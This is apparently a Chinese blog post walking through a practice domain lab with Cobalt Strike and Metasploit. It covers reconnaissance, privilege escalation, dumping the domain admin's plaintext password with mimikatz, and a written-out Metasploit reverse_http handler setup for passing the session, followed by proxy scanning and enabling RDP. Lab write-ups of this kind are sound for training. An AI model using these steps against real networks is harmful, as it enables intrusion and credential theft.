0x00 前言
之前是用 msf 来做的,这次尝试尝试用 CS 来做。之前得到webshell 的步骤就不说了,一样的。直接从CS 上线开始讲起。
另外,自己用的cs 使用 beacon/reverse_tcp listener 的时候,端口不监听,试了好多网上的版本都是一样,只能用beacon_http/reverse_http listenter 。 不知道大家有这个Bug 没
0x01 CS 上线
创建listener 和 payload ,然后蚁剑上传paload ,直接终端执行,成功cs 上线:
0x02 目标信息收集
首先,降低心跳值,默认是60s, 由于是测试环境,于是调整心跳值为 0:
shell systeminfo 查看主机名,系统名称,系统版本:
同时也可以得到主机域信息和安装的补丁:
同时使用shell tasklist /svc 可以查看运行的进程,同时根据进程判断主机是否存在杀毒软件:
这里列举一些常见的杀毒软件名,图片取自: https://soapffz.com/sec/558.html#menu_index_8
然后域信息收集和之前那篇一样的,得到域控,域内主机名及ip ,域管理员:
域名为 god
域中有三台主机:
stu1.god.org 192.168.52.129 (控制的这台win 7)
root-tvi862ubeh.god.org 192.168.52.129
owa.god.org 192.168.52.130 为域控
域用户有 : ligang , liukaifeng01 ,administrator
域管理员只有一个: administrator
另外,cs中选择主机,然后net view 之后会在target 中显示结果,这点比msf看起来方便
其中 porst san 先用 arp 或者 icmp 去发现主机,然后对发现的主机进行端口扫描
0x03 得到域管密码
下载 ElevateKit,加载提权插件
成功提权:
然后load mimikatz:
得到域管的明文密码
0x04 派生到msf
这里试了试CS 的 portscan ,发现效果并不是很好,很多端口没扫描出来,然后想用 cs 开 socks 代理,无奈本地cs 开socks 代理之后beacon 里面就不能敲命令了,socks stop 也停不下来。
然后又用cs 中的psexe 和 wmic 来连接域控,发现都连接不上,wmic 报下面的错误。不过上一篇文章中也提到只能用msf 中的wmic_exec 模块来执行命令,打开3389来实现远程登录。
而且cs 查了查也不知道怎么通过wmic 来执行一条条命令,所以决定把cs beacon 派生到msf 中 。
首先msf 中执行:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 192.168.127.130 //本地ip
set lport 8000
exploit
然后cs 上先创建一个foreign listener ,host 选择 msf 的ip ,post 选择msf 监听的port 。
然后spawn ,msf 就得到了cs 传过来的会话
然后通过msf设置 socks 4 代理,proxychains nmap 来扫描。
接着msf 用上篇说到的模块来命令执行,开启3389等
0x05 后记
说说用cs 和 msf 的体验和一些愚见:
(1)感觉msf 更细一些,模块更多一些, 虽然cs 由各种各样的插件,但是整体还是没有msf 细。
(2)cs 一些图形化展示看起来更加直观,而且图形化界面在一定程度上还是比 命令行方便。但其实msf 用熟了之后也挺顺手的。
(3)使用的时候还是需要联合使用吧,两个框架的侧重点不同,cs 更加倾向于团队合作(网上还说cs 更加倾向于后渗透)。
(4)cs 需要去网上找破解版,msf 直接是开源的,有什么bug 啥的,可以去看issue , 而且社区更广一些 。
(5)msf 和 cs 都是渗透的两大神器,都很优秀。配合使用,达到最大的效果。
参考:
https://soapffz.com/sec/558.html#menu_index_15
http://blog.leanote.com/post/snowming/43cef4b64cbd
5010
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
